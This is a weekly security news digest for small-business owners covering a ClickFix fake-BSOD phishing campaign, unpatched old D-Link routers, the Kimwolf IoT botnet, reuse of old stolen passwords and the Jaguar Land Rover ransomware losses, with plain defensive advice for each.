Security News for week of January 4th
ClickFix Update
There is a new version of ClickFix that is actively targeting businesses in the hospitality sector. A phishing email redirects users to a fake Bookings.com page where the browser enters fullscreen mode without notice and then displays a fake Blue Screen of Death (BSOD). This makes it appear that the computer has crashed, and then this fake BSOD instructs users to run a script to fix the system. The script is malicious and running it installs malware.
ClickFix is a type of social engineering that tricks the user into running a malicious script and has grown in popularity the last two years. ClickFix attacks started out being pretty easy to catch but they are growing increasingly sophisticated and harder to catch. Faking a BSoD is an advanced and novel approach. So Even if you are not in hospitality. be on the look out-- this version of ClickFix can easily be adapted to target any industry.
You can read our article on ClickFix here, but all ClickFix attacks copy a malicious script to the clipboard then try to trick users into running those scripts by either opening Run in Windows (Win+R) or Terminal in macOS. So the easiest way to stay safe is to NEVER paste something into run or terminal. If anything or anyone asks you to do that, stop and reach out to someone you trust for assistance. Be extra suspicious at that point.
D-Link Router Vulnerabilities
It was revealed that cyber criminals are actively exploiting older D-Link wireless routers and modems, and D-Link says it has no plans to fix the devices, since they reached their end of support. This is to be expected since many of this routers are 15 years old, or even older, and yet there are enough of them still in use that it has caught the attention of hackers and security researchers. If you started your business after 2012 you are probably not affected, but most microbusiness owners do work from home, and when was the last time you replaced your home router?
If you have a D-Link router that is old, check that it isn’t on the list. Even if you are in the clear, this would be a good time to check your routers at home and in the office to see if they have reached their end of support, and, if they have, replace them. If they are still being supported, make sure you have the latest updates.
Kimwolf
Kimwolf is a botnet made of smart devices, and other IoT devices, especially third-party TV boxes, that recently broke the world record for traffic generated in a DDoS attack. Botnet’s are bad news for everyone since they can be used to take services offline or extort companies for large payouts.
But here is the thing, the botnet is made of ordinary people’s internet connected devices. So if you have IoT or smart devices in your house, there is a chance you are partaking in a botnet or residential proxy network without knowing. For Kimwolf, specifically, a security researcher has produced a tool that will show if any identified part of the Kimwolf botnet is coming from your home or office’s IP address https://Synthient.com/check. The website will check the IP address you are visiting from, so you will have to visit it once per network (separately from the home and office). Also turn off your VPN since the IoT devices won’t be using it.
If your IP address is found, follow these remediation steps. If not, you can breate a sigh of relief, but there are residential proxies that may be using your smart devices or IoT devices, and you should follow these steps to protect yourself and others, since residential proxy networks use ordinary people’s network devices to commit cybercrimes. Protect yourself and protect everyone else!
Older passwords, fresh attacks
Cybercriminals have been using usernames and passwords that have been in criminal databases for several years to gain access to cloud based file sharing and data storage. The data was initially stolen vian InfoStealers that are installed via malvertising.
This suggests the victims lacked endpoint protection their devices, and they have not changed their passwords for several years.
To avoid becoming a victim, install endpoint protection, use strong passwords and MFA on your online accounts, and change the passwords for online accounts annually-- email, file storage, or any application that stores data on the service provider’s network. Also regularly check at https://haveibeenpwned.com/ to see if your accounts are in published data breaches-- there were several high profile breaches at the end of 2025. If any of your accounts appear on haveibeenpwned, change that password right away.
Jaguar got pwned
Jaguar Land Rover (JLR) learned in 2025 that being cheap on cybersecurity can be expenisve. In 2025 they got hammered by a ransomware attack that forced them to shutdown production and lay off workers. They just announced this week that the attack led to a 43% decline in third-quarter sales, and the total cost of the incident is now estimated to be $220 million dollars.
It is pretty clear that Jaguar did not invest adequately in security before this event, and has paid dearly for it. They had to lay off workers for weeks, and the situation was so dire that they needed a £1.5 billion loan from the government to restart operations.
Microbusiness owners can’t expect handouts from the government when their business gets hit by ransomware –be sure to plan for ransomware attacks before they take your business down.
